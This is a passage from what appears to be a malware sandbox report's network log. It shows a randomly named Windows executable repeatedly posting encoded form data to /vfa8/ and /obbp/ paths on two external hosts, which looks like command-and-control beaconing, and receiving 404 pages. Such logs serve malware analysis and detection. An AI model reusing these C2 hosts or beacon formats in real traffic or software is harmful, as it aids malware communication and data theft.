                                                                                                                                                        Data Ascii: ZrE=/RrkgnNt3QCterflLO0VlEAQHmpeK+c1PEAGB3/jae9dmq+2iPgHmlyAtF3vwriIqpXecAuf7i+sQUFQRSqhlNgDuI4DSQEkEPklPPbpMNPVPn+rJnU+/Yh40rBdKPtbc4jMGTrmmBUglK7QWvf+x+5Z2XxNF5Ga26XKyBokegrlTFsIp5fFrWn4oVnv8LbKEFXr/Z9aTn1DfIDZAbXyAMdj59tPJba83g==
                                                                                                                                                        Dec 5, 2024 05:40:12.810494900 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:12 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Content-Length: 389
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        21192.168.2.650008162.213.249.216803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:14.234867096 CET1852OUTPOST /vfa8/ HTTP/1.1
                                                                                                                                                        Host: www.tophcom.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.tophcom.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.tophcom.online/vfa8/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 2f 52 72 6b 67 6e 4e 74 33 51 43 74 65 72 66 6c 4c 4f 30 56 6c 45 41 51 48 6d 70 65 4b 2b 63 31 50 45 41 47 42 33 2f 6a 61 65 31 64 6d 35 32 32 74 4d 49 48 38 6c 79 41 7a 56 33 71 77 72 6a 53 71 70 66 43 63 41 72 69 37 6b 79 73 52 33 39 51 47 54 71 68 76 4e 67 44 73 49 34 43 50 67 46 75 45 50 30 68 50 4c 33 70 4d 4e 50 56 50 6d 75 72 4f 79 6f 2b 35 59 68 37 69 37 42 4a 63 50 74 7a 63 34 37 36 47 54 2b 64 6d 51 30 67 6c 71 72 51 55 61 44 2b 33 75 35 62 78 58 78 76 46 35 62 45 32 35 6a 77 79 41 4e 2f 65 67 50 6c 52 78 56 73 79 39 72 47 78 56 37 41 70 30 50 51 79 2f 66 4a 64 33 66 58 34 49 4d 71 59 6e 46 30 5a 39 4b 45 44 72 62 7a 51 63 68 49 6e 5a 34 47 43 6f 7a 4c 6a 36 6a 39 75 79 35 4c 31 76 51 38 6d 50 45 78 77 63 31 73 78 30 6f 65 57 6a 75 69 71 70 44 5a 43 58 51 54 57 36 38 75 48 41 39 6f 73 77 59 30 67 6e 77 42 44 42 79 71 4c 47 55 44 37 68 36 61 32 72 44 53 67 33 45 73 31 64 7a 30 72 73 4e 53 59 6e 6d 38 54 30 5a 74 58 66 4c 55 78 43 70 74 65 68 55 4e 45 77 4b 4a 30 76 57 32 2f 4c [TRUNCATED]
                                                                                                                                                        Data Ascii: ZrE=/RrkgnNt3QCterflLO0VlEAQHmpeK+c1PEAGB3/jae1dm522tMIH8lyAzV3qwrjSqpfCcAri7kysR39QGTqhvNgDsI4CPgFuEP0hPL3pMNPVPmurOyo+5Yh7i7BJcPtzc476GT+dmQ0glqrQUaD+3u5bxXxvF5bE25jwyAN/egPlRxVsy9rGxV7Ap0PQy/fJd3fX4IMqYnF0Z9KEDrbzQchInZ4GCozLj6j9uy5L1vQ8mPExwc1sx0oeWjuiqpDZCXQTW68uHA9oswY0gnwBDByqLGUD7h6a2rDSg3Es1dz0rsNSYnm8T0ZtXfLUxCptehUNEwKJ0vW2/Lz1Qz5NppSxBCiyFlpvw6wp3HdVyg4Dv7/DUlrrtdNVxR8lJ+CaIc0BRotgbsFsXceGTLCumjlokjX5JdEc+WYAQoluxsrFh/r6c1cN8fl4RgY810Dr4TrtBXTfm4IRgyhmGWie0eXleA/V89YkXU4MWUTfu5B0TPcfT/5+UmKB8cfwhG8xgATguanuMgAzCct/M53YW07FtDtjTpeYoJZcS0qdsJWmPp4s7phTKWAGOAsqcFGT8dznTca2XOJgO9CmdMA0YePlYSP8yhn6Xw/f4L5VBUed8Tl2QCzdqrdS0UohKVVXMqa5sWy82JYrbIlYkxVgZK2K7Mf2noxxUsnBBHwXGTkXzJAum2p5BX1vqkuVuboeaAX/KfpGb/iRys+g4Vz0N/A+QWa0NhWeQ9r3lEFv7zwQ616hzrXXpPgnXi4561KKtCAcZItyINMG2uwkn5PDNcRBnlO+FU4Yc996VDE5FoIUovjW8NypvM7XgsmaZBjxUEhY9Eaxrv6/5ZmAFsvfKCC2erg8LQ5aMka7PAL6e5/xGmx2OHS/kNVuzhHJ8707MTFGwB5pAi/96xY93aOtAZAZu0q7tRJhsbRV/spMB+Zu/kZ58jgfICVNPZtGWX85H7+iZZEMyc1UL9te7j7HkkNbGNWqETIR2nD/VBRCN74TTqxJ [TRUNCATED]
                                                                                                                                                        Dec 5, 2024 05:40:15.691303015 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:15 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Content-Length: 389
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        22192.168.2.650009162.213.249.216803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:16.892879009 CET550OUTGET /vfa8/?ZrE=yTDEjSVS0lCRYcLIcrIR3TcCYEVKOYUzZB0jcnDiZYtjnJOoqq5Z+2u71ELG2uGtiKDGExTS3yLoYSdFQgyUiMInkJIsAAFuKMZReKrfZcHWOCruByZu1/Jk+op4CslnIJH3FWE=&Jr=tnaxxtx HTTP/1.1
                                                                                                                                                        Host: www.tophcom.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Dec 5, 2024 05:40:18.370517015 CET548INHTTP/1.1 404 Not Found
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:18 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Content-Length: 389
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        23192.168.2.65001062.149.128.40803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:24.001055956 CET824OUTPOST /obbp/ HTTP/1.1
                                                                                                                                                        Host: www.chalet-tofane.net
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.chalet-tofane.net
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.chalet-tofane.net/obbp/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 6e 2b 47 59 6e 31 6a 6f 47 49 76 6c 2f 50 39 2f 61 2b 7a 32 79 31 50 6f 30 39 4f 6a 33 5a 50 75 58 71 4d 44 65 57 2b 50 79 43 68 6b 36 73 6f 38 4e 35 33 70 52 34 63 2b 4b 58 68 66 6a 45 53 46 65 6a 4e 76 69 4f 6b 70 46 50 31 45 79 48 67 38 68 46 71 58 57 46 32 65 79 6a 35 52 59 30 69 58 6e 39 59 53 74 42 6a 4b 47 64 6b 4e 31 6f 54 47 53 32 67 41 46 76 65 50 41 45 36 57 46 39 41 72 4d 62 62 4a 66 35 53 55 77 69 31 76 45 6a 74 41 61 61 78 39 4d 63 57 56 4f 69 34 69 32 67 4a 58 75 2f 57 31 5a 37 61 70 6f 59 63 2b 71 36 49 6d 2f 44 34 57 35 4d 52 48 4b 6a 35 53 6f 35 7a 4f 4a 58 35 67 74 4c 71 63 77 6e 71 55
                                                                                                                                                        Data Ascii: ZrE=n+GYn1joGIvl/P9/a+z2y1Po09Oj3ZPuXqMDeW+PyChk6so8N53pR4c+KXhfjESFejNviOkpFP1EyHg8hFqXWF2eyj5RY0iXn9YStBjKGdkN1oTGS2gAFvePAE6WF9ArMbbJf5SUwi1vEjtAaax9McWVOi4i2gJXu/W1Z7apoYc+q6Im/D4W5MRHKj5So5zOJX5gtLqcwnqU
                                                                                                                                                        Dec 5, 2024 05:40:25.293838978 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                        Cache-Control: private
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:25 GMT
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Length: 4953
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                                                                                                                        Dec 5, 2024 05:40:25.293853998 CET1236INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                                                                                                                                        Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                                                                                                                        Dec 5, 2024 05:40:25.293864965 CET1236INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                                                                                                                                        Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                                                                                                                        Dec 5, 2024 05:40:25.293879986 CET1236INData Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c
                                                                                                                                                        Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                                                                                                                                        Dec 5, 2024 05:40:25.293890953 CET228INData Raw: 64 69 72 65 63 74 6f 72 79 20 61 6e 64 20 74 72 79 20 74 68 65 20 72 65 71 75 65 73 74 20 61 67 61 69 6e 2e 20 0a 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e
                                                                                                                                                        Data Ascii: directory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        24192.168.2.65001162.149.128.40803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:40:26.656594992 CET848OUTPOST /obbp/ HTTP/1.1
                                                                                                                                                        Host: www.chalet-tofane.net
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.chalet-tofane.net
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.chalet-tofane.net/obbp/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 6e 2b 47 59 6e 31 6a 6f 47 49 76 6c 2f 76 4e 2f 62 59 37 32 6c 6c 50 76 2b 64 4f 6a 35 35 50 69 58 71 49 44 65 58 4b 6c 7a 77 46 6b 36 4f 41 38 4d 39 6a 70 63 59 63 2b 43 33 67 55 75 6b 53 61 65 6a 41 59 69 4d 77 70 46 50 68 45 79 47 51 38 68 32 79 51 57 56 32 59 39 44 35 54 46 6b 69 58 6e 39 59 53 74 42 6e 73 47 64 38 4e 31 34 6a 47 54 58 67 42 45 76 65 4d 44 45 36 57 42 39 41 76 4d 62 62 33 66 38 37 63 77 67 4e 76 45 69 78 41 5a 49 5a 36 48 63 57 58 43 79 35 53 37 53 59 4d 6a 63 54 45 51 34 43 47 78 37 51 39 6d 73 4a 38 6a 77 34 31 72 63 78 46 4b 68 68 67 6f 5a 7a 6b 4c 58 42 67 2f 63 6d 37 2f 54 50 33 53 63 34 54 67 64 63 57 46 6c 77 54 42 38 49 4e 50 61 78 2f 69 51 3d 3d
                                                                                                                                                        Data Ascii: ZrE=n+GYn1joGIvl/vN/bY72llPv+dOj55PiXqIDeXKlzwFk6OA8M9jpcYc+C3gUukSaejAYiMwpFPhEyGQ8h2yQWV2Y9D5TFkiXn9YStBnsGd8N14jGTXgBEveMDE6WB9AvMbb3f87cwgNvEixAZIZ6HcWXCy5S7SYMjcTEQ4CGx7Q9msJ8jw41rcxFKhhgoZzkLXBg/cm7/TP3Sc4TgdcWFlwTB8INPax/iQ==
                                                                                                                                                        Dec 5, 2024 05:40:27.948327065 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                        Cache-Control: private
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:40:27 GMT
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Length: 4953
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                                                                                                                        Dec 5, 2024 05:40:27.948350906 CET1236INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                                                                                                                                        Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                                                                                                                        Dec 5, 2024 05:40:27.948363066 CET1236INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
